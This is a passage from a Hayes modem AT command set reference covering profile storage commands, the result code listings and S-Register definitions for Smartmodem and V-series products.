and stored profiles (commands and +S-Register settings) along with any stored telephone numbers. Input from the +DTE is ignored while this view configuration information is being sent to the +DTE. + +The example below illustrates the &V info-text when the factory profile is +loaded and then stored into the stored profiles, and an arbitrary phone number +is stored in one of the stored numbers locations. + +ACTIVE PROFILE: +B0 B41 B60 E1 L2 M1 N1 P Q0 V1 W0 X4 Y0 &C0 &D0 &G0 &J0 &K3 &Q5 +&R0 &S0 &T4 &U0 &X0 &Y0 +S00:000 S01:000 S02:043 S03:013 S04:010 S05:008 S06:002 S07:030 S08:002 +S09:006 +S10:014 S11:070 S12:050 S18:000 S25:005 S26:001 S36:005 S37:000 S38:020 +S44:003 +S46:002 S48:007 S49:008 S50:016 S95:000 + +STORED PROFILE 0: +B0 B41 B60 E1 L2 M1 N1 P Q0 V1 W0 X4 Y0 &C0 &D0 &G0 &J0 &K3 &Q5 +&R0 &S0 &T4 &U0 &X0 +S00:000 S02:043 S06:002 S07:050 S08:002 S09:006 S10:014 S11:095 S12:050 +S18:000 +S25:005 S26:001 S36:005 S37:000 S38:020 S44:003 S46:002 S48:007 S49:008 +S50:016 + +STORED PROFILE 1: +B0 B41 B60 E1 L2 M1 N1 P Q0 V1 W0 X4 Y0 &C0 &D0 &G0 &J0 &K3 &Q5 +&R0 &S0 &T4 &U0 &X0 +S00:000 S02:043 S06:002 S07:050 S08:002 S09:006 S10:014 S11:095 S12:050 +S18:000 +S25:005 S26:001 S36:005 S37:000 S38:020 S44:003 S46:002 S48:007 S49:008 +S50:016 + +TELEPHONE NUMBERS: +0= +1=T9W14045551212 +2= +3= + +The three-digit numbers after each S-Register number are decimal +representations of the S-Register contents. + +&W - Write Active Profile to Memory +The &W command stores certain command options and S-Register values into one +of the modem's two nonvolatile stored profile memory locations. The command +options and register values stored depend on the particular modem. These are +indicated on the AT Command Set Reference Card. In addition, the AT speed and +parity are stored, according to the values used at the time the command is +issued. + +&W0 Store the Active Profile into Stored Profile 0 +&W1 Store the Active Profile into Stored Profile 1 + +&X - Synchronous Transmit Clock Source +The &X command determines how the DTE transmit clock is generated while the +modem is in the synchronous mode. + +&X0 Modem generates the transmit clock and applies it to pin 15 (EIA 232-D) + +&X1 DTE generates the transmit clock on pin 24 (EIA 232D) and the modem + applies this clock to pin 15 (EIA 232D). This setting is available for + external modems only + +&X2 Modem derives the transmit clock from the receive carrier signal and + applies it to pin 15 (EIA 232-D) + +&Y - Select Stored Profile For Hard Reset +The &Y command selects which stored profile will be copied into the active +profile subsequent to a hard reset (including power-up). The &Y command +execution is nonvolatile, stored at the time the command is executed, not by +the &W command. The value selected with this command is not affected by the &F +command, although &Y0 is selected as part of the overall factory setup. + +&Y0 Select Stored Profile #0 on powerup +&Y1 Select Stored Profile #1 on powerup + +&Zn=x - Store Telephone Number +The &Zn=x command is used to store up to four dialing strings in the modem's +nonvolatile memory for later dialing. The format for the command is +&Zn="stored number" where n is the location 0-3 to which the number should be +written. For example, the line AT&Z2=1552368 writes 1552368 as the third +of four possible numbers to the modem's "telephone book" in nonvolatile +memory. The &Zn=x command can be used to store a number with as many as 36 +characters. + +Any dialing string can be saved except the S dialing modifier (this would +cause a stored dialing string to attempt to dial another stored string), or +the ; modifier if used for automatic dialing in synchronous mode 2. If no dial +string follows the command, the referenced stored number will be cleared. + +&Z +&Z= +&Zn= ... where n=0-3 + +If the delimiter (=) is not present, the characters following the &Zn=x are +treated as telephone numbers and/or modifiers and are stored in location 0. +For example, in &Znxxxx, the n is a part of the phone number. If the delimiter +is present the characters following it are stored in the location specified by +the character preceding the delimiter (which must be in the range 0-3). If no +character precedes the delimiter, the number is stored in location 0. If an +invalid location is specified (n) the modem sends an ERROR result code. + +Characters not listed above as storable are ignored. For example, the command +&Z1=3456H;AX would store 3456;A. + +***************************************************************************** +1.2 Result Code Listing +This section defines the result codes returned by Hayes modems in response to +commands. + +The table below shows the various formats in which modem responses can be +presented. Note that the "text" of the info-text may consist of multiple lines +of text. The formats depicted here only refer to the characters +between info-texts and not within them. + + V0 V1 +------------------------------------------------- +Information Text text + text + + +Result Codes numeric code + verbose code + + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +1.2.1 Command Response and Call Progress Monitoring +This set of result codes includes responses to commands and call progress +monitoring responses. They are available to all modems within the capabilities +of the modem. For example, the result code CONNECT 9600 is not available to +Smartmodem 2400. The factory setting for all high-speed modems enables the +extended set of call progress monitoring (X4). When set up in this way, the +modem performs and reports full call progress monitoring (RING, NO CARRIER, NO +DIALTONE, and BUSY). It also indicates the speed of the connection (CONNECT +1200 as opposed to simply CONNECT). The factory setting for Smartmodem 300, +Smartmodem 1200, and all others whose highest speed is 1200 bps is basic call +progress monitoring (X0). + +The command response and call progress monitoring result codes are defined +below: + +0 - OK +This result code indicates that a command or command string was executed. Note +that if more than one command were included on a line and an ERROR result code +received, this means that one or more of the commands was not processed. If +one or more were executed properly, but even one was invalid, no OK will be +issued, only the ERROR. + +1 - CONNECT +This result code indicates a connection was made between the DTE and the +modem. If X4 (extended set of call progress monitoring) were selected, the +code indicates that a connection from at 0 to 300 bps was made. However, if X0 +(basic set of call progress monitoring) were selected, the connection could be +0-300, 1200, 1200/75, 75/1200, 2400, 4800, 9600,19200, or 38400 bps. If the +modem is not operating in error-control mode, this is the same as the line +speed. See other CONNECT messages and CARRIER messages. + +2 - RING +This result code indicates the modem as detected a ring signal. No distinction +can be made as to whether this is a voice call, a modem call, a fax call, or +other type. + +3 - NO CARRIER +This result code indicates that no carrier signal was detected, or that the +signal was lost. This is the response the modem will give when no connection +is made; see CONNECT result code. The modem will also return this message when +the connection is broken, either intentionally as when the hangup process +completes, or if line difficulties break the connection. + +4 - ERROR +This result code indicates that an invalid command was issued, or that there +was an error in the command line. For example, if the command line exceeds 40 +characters for Smartmodem Products or 255 characters for V-series System +Products, this result code will be returned. This result code is also returned +in response to the I1 command requesting a ROM checksum, if the modem detects +an error in the computation. + +5 - CONNECT 1200 +This result code indicates a connection has been established at 1200 or +1200/75, 75/1200, bps between the modem and the DTE. If the modem is not +operating in error-control mode, this is the same as the line speed. This +result code is disabled by X0. Only CONNECT is reported. + +6 - NO DIALTONE +This result code indicates that no dial tone was detected when the modem went +off hook. Dial tone detection and this result code are enabled by X2 or X4, or +the W dial modifier. + +7 - BUSY +This result code indicates that the modem detected a busy signal when it +attempted to connect with the modem at the number dialed. Busy signal +detection and this result code are enabled by X3 or X4. + +8 - NO ANSWER +This result code indicates no silence was detected when dialing a system not +providing a dial tone. Enabled by the @ dial modifier. + +10 - CONNECT 2400 +This result code indicates a connection has been established at 2400 bps +between the modem and the DTE. If the modem is not operating in error-control +mode, this is the same as the line speed. This result code is disabled by X0. +Only CONNECT is reported. + +11 - CONNECT 4800 +This result code indicates a connection has been established at 4800 bps +between the modem and the DTE. This result code is disabled by X0. + +12 - CONNECT 9600 +This result code indicates a connection has been established at 9600 bps +between the modem and the DTE. This result code is disabled by X0. + +14 - CONNECT 19200 +This result code indicates a connection has been established at 19200 bps +between the modem and the DTE. This result code is disabled by X0. + +22 - CONNECT 1200/75 +This result code indicates a connection has been established at 1200 bps when +transmitting data and 75 bps when receiving data between the modem and the +DTE. + +23 - CONNECT 75/1200 +This result code indicates a connection has been established at 75 bps when +transmitting data and 1200 bps when receiving data between the modem and the +DTE. + +28 - CONNECT 38400 +This result code indicates a connection has been established at 38400 bps +between the modem and the DTE. This result code is disabled by X0. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +1.2.2 Negotiation Progress Messages +V-series system products report special result codes during error-control +negotiation. Whether or not these messages are displayed is selected with the +W command (not to be confused with the W dial modifier). The factory setting +is messages disabled (W0) to avoid conflict with software programs that do not +support this additional level of call progress monitoring. + +40 - CARRIER 300 +This message indicates that a carrier signal has been detected at 300 bps +(modem-to-modem line speed). + +44 - CARRIER 1200/75 +This message indicates that a carrier signal has been detected at 1200 bps +when transmitting and at 75 when receiving (modem-to-modem line speed). + +45 - CARRIER 75/1200 +This message indicates that a carrier signal has been detected at 75 bps when +transmitting and at 1200 bps when receiving (modem-to-modem line speed). + +46 - CARRIER 1200 +This message indicates that a carrier signal has been detected at 1200 bps +(modem-to-modem line speed). + +47 - CARRIER 2400 +This message indicates that a carrier signal has been detected at 2400 bps +(modem-to-modem line speed). + +48 - CARRIER 4800 +This message indicates that a carrier signal has been detected at 4800 bps +(modem-to-modem line speed). + +50 - CARRIER 9600 +This message indicates that a carrier signal has been detected at 9600 bps +(modem-to-modem line speed). + +66 - COMPRESSION: CLASS 5 +This message indicates that data compression using MNP Class 5 has been +negotiated for the connection. + +67 - COMPRESSION: V.42BIS +This message indicates that data compression using CCITT V.42bis has been +negotiated for the connection. + +68 - COMPRESSION: ADC +This message indicates that data compression using Hayes Adaptive Data +Compression has been negotiated for the connection. + +69 - COMPRESSION: NONE +This message indicates that data compression was not negotiated for the +connection. + +70 - PROTOCOL: NONE +This message indicates that no protocol was negotiated for the connection. A +standard asynchronous connection was made. + +71 - PROTOCOL: ERROR-CONTROL/LAP-B +This message indicates that an error-control connection was negotiated with +LAPB protocol. This protocol is the one used by the first V-series System +Products. + +72 - PROTOCOL: ERROR-CONTROL/ LAP-B/HDX +This message indicates that a half-duplex error-control connection was +negotiated with LAPB protocol. This protocol is the one used by the first V- +series System Products communicating at 9600 bps. + +73 - PROTOCOL: ERROR-CONTROL/LAP-B/AFT +This message indicates that an error-control connection was negotiated using +the Hayes Asynchronous Framing Technique. This protocol is used for +connections between modems such as Smartmodem 1200 that do not communicate +synchronously across the telephone line. AFT enables an error-control protocol +to be used. + +74 - PROTOCOL: X.25/LAP-B +This message indicates that an error-control connection using the X.25 +protocol was established with a carrier speed of 1200, 2400, 4800, or 9600 +bps. + +75 - PROTOCOL: X.25/LAP-B/HDX +This message indicates that a half-duplex error-control connection using the +X.25 protocol was established with a carrier speed of 4800 or 9600 bps. + +76 - PROTOCOL: X.25/LAP-B/AFT +This message indicates that an asynchronous error-control connection using the +X.25 protocol was established with a carrier speed of 1200 bps. The Hayes +Asynchronous Framing Technique was used. + +77 - PROTOCOL: LAP-M +This message indicates that an error-control connection using the V.42 LAPM +protocol was established with a carrier speed of 1200, 2400, 4800, or 9600 +bps. + +78 - PROTOCOL: LAP-M/HDX V.42 +This message indicates that a half-duplex error-control connection using the +V.42 LAPM protocol was established with a carrier speed of 4800 or 9600 bps. + +79 - PROTOCOL: LAP-M/AFT +This message indicates that an asynchronous error-control connection using the +V.42 LAPM protocol was established with a carrier speed of 1200 bps. The Hayes +Asynchronous Framing Technique was used. + +80 - PROTOCOL: ALT +This message indicates that an error-control connection using the V.42 LAPM +alternative protocol was established with a carrier speed of 1200, 2400, 4800, +or 9600 bps. This protocol is MNP Classes 2, 3, and 4 compatible. + +91 - AUTOSTREAM: LEVEL 1 +This message indicates that Hayes AutoStream Level 1 has been negotiated for +the connection. This technique provides for multiplexing of multiple virtual +channels. + +92 - AUTOSTREAM: LEVEL 2 +This message indicates that Hayes AutoStream Level 2 has been negotiated for +the connection. This technique provides for multiplexing of multiple virtual +channels, with transparent control of one PAD (non-simultaneous). + +93 - AUTOSTREAM: LEVEL 3 +This message indicates that Hayes AutoStream Level 3 has been negotiated for +the connection. This technique provides for multiplexing of multiple virtual +channels, with transparent control of all PADs (simultaneous). + + +Negotiation progress messages are reported in the following order: + + CARRIER + PROTOCOL + AUTOSTREAM + COMPRESSION + CONNECT + +If AutoStream is not used, no message is reported. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +1.2.3 Information Text (INFO-TEXT) +Some commands, such as &V and Sr? return information text as opposed to +numeric or verbose codes. The alpha characters are headings and commands and +the numbers are command options, ASCII values, counter values, etc. The +example below illustrates a modem response to a command with information text. + +ACTIVE PROFILE: +B0 B41 B60 E1 L2 M1 N1 P Q0 V1 W0 X4 Y0 &C0 &D0 &G0 &J0 &K3 &Q5 +&R0 &S0 &T4 &U0 &X0 &Y0 +S00:000 S01:000 S02:043 S03:013 S04:010 S05:008 S06:002 S07:030 S08:002 +S09:006 +S10:014 S11:070 S12:050 S18:000 S25:005 S26:001 S36:005 S37:000 S38:020 +S44:003 +S46:002 S48:007 S49:008 S50:016 S95:000 + +Information Text is always a combination of alpha and numeric. The V command +has no effect on the format of this command response. + +***************************************************************************** +1.3 S-Register Listing +The following definitions include all S-Registers defined for the various +families of Hayes modems. Some factory settings and ranges are included here +because they are almost universally implemented with these values; however, be +sure to consult the AT Command Set Reference Card that came with your modem +for the S-Registers and their ranges/factory settings that your modem +supports. Note that register numbers not included in this listing are those +for which no function has been assigned. + +S0 - Ring to Answer +After S0 sets the ring number on which the modem automatically answers a call +when auto-answer mode is selected. S0=0, the factory setting, disables auto- +answer. + +S1 - Ring Count +When the modem is in the command state and set for auto-answer (Register +S0>0), the modem automatically tracks the number of times the phone rings, +incrementing and writing the value in S1. The value reverts to 0 if no ring +occurs for 8 seconds. Once a connection is made, the modem resets the value of +this register to 0. Note that two short ring bursts within a ring cycle are +counted as two rings. + +S2 - Escape Sequence Character +This register holds the ASCII value of the escape sequence character. The +factory-set value is ASCII 43, the plus sign (+). The value for this register +can be set to any ASCII value between 0 and 127. Setting S2 to a value greater +than 127 disables the escape sequence, preventing the modem from returning to +the command state and disabling command recognition. + +S3 - Carriage Return Character +This register holds the ASCII value of the line terminating character. The +factory-set value is ASCII 13 - carriage return () - the range for the +register is 0-127. This character is used both as the command line terminator +and the result code terminator. + +S4 - Line Feed Character +This register holds the ASCII value of the line feed character. The factory +setting is 10; the range is 0-127. + +S5 - Backspace Character +This register holds the ASCII value of the backspace character. The factory- +set value is ASCII 08; the range for the register is 0-32, 127. This character +moves the cursor left, removing the previous character. As this value actually +represents the combined operation of three characters (a backspace, a space, +and another backspace), the time allotted to process the backspace character +must not be any less than the time required by the modem to transmit three +characters. For this reason, a repeat-key function may not operate properly on +backspaces. + +S6 - Wait Before Blind Dialing +This register determines how long the modem waits after going off-hook before +it dials. This delay allows time for the central telephone office to detect +the off-hook condition of the line and apply dial tone. This wait time only +applies to the first dial tone. S6 is used only if X0, X1, or X3 is selected. +Selecting X3 or X4 enables dial tone (call progress) detection and disables +blind dialing, thus making the setting of S6 irrelevant. The value of this +register can be set for any number from 4 through 7 seconds. This feature +allows you to increase the time delay if you have difficulty obtaining dial +tone within 4 seconds. + +Note: The Wait Before Blind Dialing call progress monitoring feature (W dial +modifier) applies only to detection of a second dial tone and is independent +of any S-Register settings. + +S7 - Wait for Carrier after Dialing +This register determines the modem's time delay between dialing and responding +to an incoming carrier signal after initial connection. If the modem does not +detect a carrier within this time, the modem hangs up and returns the NO +CARRIER result code. If the modem detects a carrier within the specified time, +it goes on line. + +S8 - Duration of Delay for Comma Dial Modifier +This register determines the duration of the delay generated by the comma (,) +dial modifier. + +S9 - Carrier Detect Response Time +This register determines how many seconds a carrier signal must be present for +the modem to recognize it and issue a carrier detect. The value for the +register is measured in tenths of a second. The factory setting is 6 (0.6 +second); the range is 1 (0.1 second) to 255 (25.5 seconds). + +Note: The S9 value affects the time required to recognize the presence of +carrier only if X3 or X4 is selected. The modem also ignores the value in +register S9 when operating in half-duplex synchronous or asynchronous mode. + +S10 - Delay Between Lost Carrier and Hang Up +This register specifies the time between loss of remote carrier and local +modem disconnect. The delay permits the carrier to disappear momentarily +without causing the modem to hang up. The value for the register is measured +in tenths of a second. The range for most modems is 1 (0.1 second) to 255 +(25.5 seconds). + +The modem recognizes a carrier after the period of time specified in S9. +Therefore, if the value of S10 is less than that set for S9, even a momentary +loss of carrier will cause the modem to disconnect. Setting the register to +255 causes the modem to ignore actual carrier status and assume a carrier is +always present. When operating in half-duplex synchronous mode, the modem +ignores the value of this register. + +S11 - Multi-Frequency Tone Duration +This register determines the duration and spacing of tones in multi-frequency +tone dialing. The value in this register has no effect on the speed of pulse +dialing. + +S12 - Escape Sequence Guard Time +This register holds the value of the delay required prior to and following the +escape sequence. The guard time also dictates how quickly the escape sequence +characters must be entered, since the interval between entry of each of the +three characters must be of shorter duration than that specified for the guard +time. If guard time is set to 0, timing is not a factor. + +S18 - Modem Test Timer +This register establishes the duration of the modem's diagnostic tests. When a +test is active for a length of time equal to the value chosen for this +register, the modem automatically terminates the test. A setting of zero (0) +disables the test timer (factory setting). The range for this register is 0- +255 seconds. + +S25 - DTR Detection +This register serves two purposes. When the modem is operating in synchronous +mode 4, the value assigned to S25 specifies the length of time the modem waits +after a connection has been made, before examining the DTR circuit. This +allows the modem to ignore an on-to-off transition of DTR and gives the user +sufficient time to disconnect the modem from the asynchronous terminal and +attach it to a synchronous terminal, without forcing the modem back to the +asynchronous command state. During this time, the value of S25 is read in full +seconds (e.g., the factory- set value of 5 equals 5 seconds, instead of 0.05 +seconds). + +In all other modes, and after call establishment in synchronous mode 4, the +value is read in 1/100 seconds. In any mode, a change in DTR (on or off) that +persists for a period shorter than the value held in S25 is ignored by the +modem while it is on-line. The range of values for S25 is 0-255. + +S26 - RTS to CTS Interval +This register is used to specify the interval to delay before turning on CTS +after an off-to-on transition of RTS. This value takes effect when the &R0 +command option has been selected. This setting applies to synchronous modes 1, +2, and 3 only. The factory-set value is 1 (.01 seconds) with a range of 0-255. + +S30 - Inactivity Timeout +This register monitors the line to prevent unnecessary connection time. If no +data transfer is detected (while the modem is in the on-line state) for a +duration specified by this register, the modem hangs up and returns to the +idle state. When the value of S30 is set to 0, the timer is disabled. The +factory setting is 0 seconds; the range is 0-255 units of 10 seconds. Note +that S30 is only effective in &Q0 or &Q6 modes; it is not enabled in any +synchronous modes. + +S33 - AFT Options +Register S33 applies only to communications using a V-series Modem +Enhancer(TM) with a Smartmodem 1200 which has an asynchronous DTE link. + +This register selects the options to be used with Hayes Asynchronous Framing +Technique (See the description of S44. AFT offers options to prevent certain +characters (like XON and XOFF) from being sent. Normally AFT uses all 256 +ASCII character codes; that is, it uses characters with 8 data bits. If +intervening equipment is limited to 7-bit operation, the Eight-Bit Data +Transparency option (S33=4) can be enabled. + +With this option, AFT limits itself to using characters with 7 data bits. This +pertains only to the communication link between the two modems, not the format +of the data. The data itself is unaffected by enabling any AFT transparency +options. + +0 No transparency options required (factory setting) +1 Flow Control Transparency. AFT transparentizes the XON and XOFF control + characters sent from the DTE to the modem. The XON and XOFF characters + themselves are not sent over the communication link; characters that + substitute for these functions are transmitted, instead +2 Select Control Character Transparency +4 Select Eight-Bit Data Transparency +5 Select both Flow Control Transparency and Eight-Bit Data Transparency +6 Select both Control Character Transparency and Eight-Bit Data + Transparency + +If feature negotiation is active, the transparency option selected by one +modem is used by both modems. + +S36 - Negotiation Failure Treatment +When an attempt to make an error-control connection fails, the modem reads +this register to determine whether to terminate the connection, make an +asynchronous connection (otherwise selected with &Q0), or make an asynchronous +connection with ASB (otherwise selected with &Q6). This register is referenced +only when the error-control mode has been selected with the &Q5 command +(factory setting) and this communication mode cannot be negotiated. + +0 Hang up +1 Attempt a standard asynchronous connection (&Q0) +3 Attempt an asynchronous connection using automatic speed buffering (&Q6) +4 Attempt a V.42 Alternative Protocol connection (MNP compatible); if + negotiation fails, hang up. +5 Attempt a V.42 Alternative Protocol connection (MNP compatible); if + negotiation fails, attempt a standard asynchronous connection +7 Attempt a V.42 Alternative Protocol connection (MNP compatible); if + negotiation fails, attempt an asynchronous connection using automatic + speed buffering + +In asynchronous mode, the CONNECT XXXX message will be returned with a +successful connection. This message indicates the speed of the connection, +which is also the speed of data transmitted from computer to modem. + +Note: The selected fallback option can be initiated immediately with S48. For +example, a connection attempt using the Alternative Protocol can be forced by +setting S48=128 and S36=5 or 7. + +S37 - Desired DCE Line Speed +The modem attempts to connect with a remote modem at the highest supported DCE +speed that does not exceed the value specified by this register. If S37 is set +to a speed higher than that supported by the modem, it will attempt to connect +at its highest capability. + +0 Attempt to connect at speed of last AT command issued +1 Attempt to connect at 75 bps +2 Attempt to connect at 110 bps +3 Attempt to connect at 300 bps +4 Reserved +5 Attempt to connect at 1200 bps +6 Attempt to connect at 2400 bps +7 Attempt to connect at 4800 bps +8 Reserved +9 Attempt to connect at 9600 bps + +Note that this is the speed of modems across the telephone line, not the speed +at which the modem communicates with the attached DTE. + +S38 - Delay Before Forced Hang up +This register specifies the delay between the modem's receipt of the command +to hang up (or on-to-off transition of DTR if the modem is configured to +follow the signal) and the disconnect operation. This register is useful for +error-control communications to ensure that data in the modem buffers is sent +before the connection is terminated. The factory setting is 20 (seconds). If +this register is set between 0 and 254, the modem will wait that number of +seconds for the remote modem to acknowledge receipt of all data in buffers +before hanging up. If this timeout occurs before all data can be sent, the NO +CARRIER (3) result code will be sent to indicate that data has been lost. If +all data is transmitted prior to the timeout, the response to the H0 command +will be OK. + +If S38 is set to 255, the modem does not timeout, and continues to attempt to +deliver data in buffers until the connection is lost, or the data is +delivered. + +S44 - Asynchronous Framing Technique Selection +S44 sets the use of the Hayes Asynchronous Framing Technique. Connections to a +packet switched network or between two error-control modems using either +Error-Control/LAP-B or X.25 protocol are usually synchronous connections, even +though the user interface is always asynchronous. Some environments may +require asynchronous to synchronous conversion in the protocol because +equipment is limited to asynchronous operation, or an asynchronous to +synchronous conversion is already in place. For example, most Hayes 1200 bps +modems support only asynchronous communication over the telephone line. When +one of these modems is connected to a V-series Modem Enhancer, the interface +between the two is always asynchronous. A feature provided by the V-series +Modem Enhancer called the Asynchronous Framing Technique (AFT) makes this +possible. When AFT is enabled, the output of the error-control protocol is +asynchronous instead of synchronous. + +Register S44 applies only to communications using a V-series Modem Enhancer +with a Smartmodem 1200 that connects using an asynchronous link across the +telephone line. + +2 Use AFT. When AFT is selected, the data output is asynchronous instead of + synchronous. AFT is required if the path your call takes passes through + asynchronous-only equipment. + +3 The modem to automatically selects whether or not to use AFT. V-series + Modem Enhancer, when connected to a Smartmodem 1200, automatically uses + AFT (factory setting). + +If the modem is configured to use feature negotiation, and the other modem is +using AFT, both modems automatically select AFT. + + +S46 - Error-Control Protocol Selection +This register specifies the error-control method used for subsequent +connections. A V-series System Product supports at least one additional +protocol. Because the factory setting will be a protocol for point-to-point +communications, other connections, such as the X.25 protocol must be enabled +by setting S46. + +Feature negotiation enables two communicating modems to identify the common +protocols, and choose one based on the user-configuration for the +communication session. For example, if a V-series System Product is configured +to use the X.25 protocol, but connects with a V-series System Product without +X.25 capability, an error-control protocol is automatically selected because +both modems support it. However, if a V-series System Product with X.25 +connects with another V-series System Product with X.25, both can use X.25 +protocol if configured to do so (S46=6). + +When attempting a connection to a packet switched network, automatic feature +negotiation is usually disabled because unless an X.25 connection can be made, +further network connections cannot be made. To disable automatic feature +negotiation and make an X.25 connection or hang up, set S46=134. The options +for this register are described below: + +0 Either LAPM or fallback to LAPB +1 LAPB only +2 LAPM or fallback to LAPB; use data compression# +3 LAPB with data compression# +6 X.25 or fallback to LAPB; use data compression# +136 LAPM only +138 LAPM with data compression# +134 X.25 + + # The technique negotiated is determined by capabilities and + configuration of both modems. V.42bis is attempted first, then Hayes + Adaptive Data Compression. If neither method is supported by both + modems, or if either modem has compression disabled, no compression will + be used. + +S48 - Enabling/Disabling Feature Negotiation +This register selects how feature negotiation is used when making connections +with the remote system. The negotiation process can be tailored to suit a +connection, or bypassed altogether. For example, when the capabilities of the +remote modem are known, negotiation is unnecessary. The factory setting is 7, +negotiation enabled. With feature negotiation disabled, the V-series System +Product assumes that the remote modem is configured the same as itself, and +proceeds to activate the error-control protocol specified by the S46 (protocol +options) setting. Use 128 when calling a packet switched network that does not +support feature negotiation. + +0 Negotiation disabled; presume the remote modem is configured for and has + the capabilities necessary for the connection selected with S46 +3 Negotiation enabled, but originating modem remains silent during + detection phase. For connections with MNP modems; however, this setting + defeats the negotiation sequence with other V.42 modems +7 Negotiation enabled +128 Negotiation disabled; forces fallback options specified in S36 to be + taken immediately + +S49 - ASB buffer size lower limit +This register sets the lower limit of the modem's buffer when communicating in +asynchronous mode with ASB. The range of this register is 1-249. The factory +setting is 8 bytes. + +S50 - ASB buffer size upper limit +This register sets the upper limit of the modem's buffer when communicating in +asynchronous mode with ASB. The range of this register is 2-250 bytes. The +factory setting is 16 bytes. + +S53 - Global PAD Configuration +S53 defines a set of behavior switches that control the PAD and all four +channels in the V-series System Product. This fixed user interface provides +software and users with a consistent PAD command interface regardless of +current PAD parameter settings. The fixed user interface is effective in all +states except the on-line (data transfer) state. + +For example, the factory-set value of PAD parameter 2 is zero, which turns off +character echo. This is required for a transparent on-line state (e.g., for +Smartmodem product emulation). However, since it may be difficult to enter PAD +commands without seeing them echoed at your terminal, a method of controlling +the PAD despite the parameter settings would be necessary. + +The fixed user interface affects the following in all states, except the on- +line state: + +* Transmission of all PAD result codes, including the prompt PAD result code +* Echo control via the E command +* Fixed editing characters (delete character is defined by S5, delete line + character is Control-X, line display character is Control-R) +* Echo mask masks only the editing characters + +The fixed PAD control interface affects the following in all states: + +* Disables PAD recall using a character (PAD parameter 1) or a break signal +* Disables all PAD flow control (PAD parameters 5, 12) +* Disables carriage return (PAD parameter 9) and line feed (PAD parameter 14) + padding +* Disables line folding (PAD parameter 10) +* Existing result codes use result codes for terminal (PAD parameter 19) +* Disables page wait (PAD parameter 22) +* Disables execution of ANS and EXEC strings +* Disables EXEC command + +If the value of S53 includes any bit value except 1, the PAD prompt character +changes from * to -. The change in the prompt PAD character provides an +indication that the PAD is not in CCITT mode. The register's values are +provided below: + +0 Normal CCITT-compatibility mode +1 Normal CCITT-compatibility mode. PAD prompt is an asterisk (*) and + appears with the channel number (e.g., 1*). +2 Fixed user interface. PAD prompt is a hyphen (-) +3 Fixed user interface. PAD prompt is a hyphen and appears with the + channel number (e.g., 1-) (factory setting) +4 Fixed control interface. PAD prompt is a hyphen +5 Fixed control interface. PAD prompt is a hyphen and appears with the + channel number +6 Fixed user and fixed control interface. PAD prompt is a hyphen +7 Fixed user and fixed control interface. PAD prompt is a hyphen and + appears with the channel number + +S63 - Leased line carrier level +This register selects the carrier power level in dBm for leased line +operation. This register specifies a nominal carrier level value. The range +for this register is 0-15 (0 dBm to -15 dBm). The factory setting is 0. Note +that for those modems supporting leased line operation, carrier level (if +adjustable) may be set by other means. Please refer to the modem's +Installation Guide for information. + +S69 - Link Layer Window Size +This register sets the number of frames (packets) sent between +acknowledgements from the remote system. Each frame is one packet and the +window size is how many frames you can send before you must stop and wait for +the remote end to send an acknowledgement that it received the frames and is +ready to receive more frames. The range is 1-15 with a factory setting of 15. +LAPM connections use a window size of 1-15; LAPB connections and X.25 +connections use a window size of 1-8. If a LAPB or X.25 connection is made, +any value greater than 8 is treated as 8. + +Reducing window size can reduce performance. Reduce the window size only when +so instructed by the network (this rarely occurs). + +S70 - Maximum Number of Retransmissions +S70 limits the number of times the modem will retransmit a frame. +Retransmissions become necessary when data errors introduced by noise disrupt +the reception of a frame. When the limit set by S70 is reached, the modem +hangs up. Raising this limit may be necessary if, for example, telephone lines +are extremely noisy. The retransmission delays may be undesirable, but the +modem will not hang up. The range for this register is 0-255, with a factory +setting of 10. + +S71 - Link Layer Timeout +When the link layer sends a character, it starts a timer referenced in the +formula below as "T1." If the remote end does not respond after T1 seconds, +the link layer retransmits. The value of T1 is computed automatically based on +the connection speed and maximum packet size. + +T1 = 2 * (maximum packet size + 11) * (8 Ö bits per second) + T2 + 500 msec + +The S71 setting is represented by the "T2" in the formula. The setting affords +some control over the final value of T1. You can increase T1 by increasing T2. +You may want to do this if your communication environment has unusually long +delays transmitting information from one end to the another (such as with +satellite connections), or if the computer at the other end takes a long time +to respond. The range for this register is 1-255 milliseconds, with a factory +setting of 20.. + +S72 - Loss of Flag Idle Timeout +A transmitter not currently sending data to send is described as "idle." +Normally, idle transmitters send a repeating pattern called "flag idle." Your +modem always monitors the line to make sure the remote end of the +communication link is either sending data or a flag idle. This ensures that +the modem is operating. S72 determines how long the local modem waits before +hanging up when it no longer is receiving data or a flag idle. + +In some systems, periods of "mark idle" (periods where all ones are +transmitted instead of the flag pattern) are normal. When using such a system, +it may be necessary to increase the value in S72. If the register is set to 0, +this monitoring function is disabled. The range for this register is 1-255 +seconds; the factory setting is 30. + +S73 - No Activity Timeout +If your modem is receiving good carrier and flag idle from the remote modem +but does not receive any data for the time period specified by S73, it will +send a query (called an "RR") to the remote modem to make sure the modem is +operating properly. + +The range for this register is 1-255 seconds; the factory setting for this +register is 5. Decreasing this value causes the modem to test more frequently +for malfunctions at the remote end. However, the modem will not hang up for +approximately 2 * T1 * N2 seconds because it retransmits the RR query several +times. + +A Note on Registers S74, S75, S76, S77, S78, and S79 +(Logical Channel Number Selectors) +Although V-series System Products supports four virtual channels, numbered 1 +through 4, packet switched networks can support up to 4096 channels (numbered +0-4095). Each network has its own channel numbering system to support multiple +users. For example, if there are 15 calls, each with four virtual connections, +the packet switched network can support all 60 (4*15) virtual calls, but each +has to have a different logical channel number. + +Networks often set up their system so that all incoming calls are within one +range and all outgoing calls are within another range. Logical Channel Numbers +are automatically assigned by the V-series System Product, but the ranges need +to be configurable in order to be compatible with different network +requirements. + +S74, S75 - Minimum Incoming Logical Channel Number (LCN) +S74 and S75 combine to specify the lowest incoming Logical Channel Number the +packet layer will report or accept. The value used is formed by using S74 as +the two high decimal digits and S75 as the two low decimal digits, or the +value can be expressed by the formula S74*100+S75. + +If the resulting value is outside the range (0-4095), the value is assigned to +the appropriate corresponding limit (e.g., if a value of 4099 is used, it is +assigned to the upper limit value of 4095). + +S74=0 Factory setting from a range of 0-40 +S75=1 Factory setting from a range of 0-99 + +S76, S77 - Maximum Incoming Logical Channel Number (LCN) +S76 and S77 combine to specify the highest incoming Logical Channel Number the +packet layer will report or accept. The value used is formed by using S76 as +the high two decimal digits and S77 as the two low decimal digits, or the +value can be expressed by the formula S76*100+S77. + +If the resulting value is outside the range (0-4095), the value is assigned to 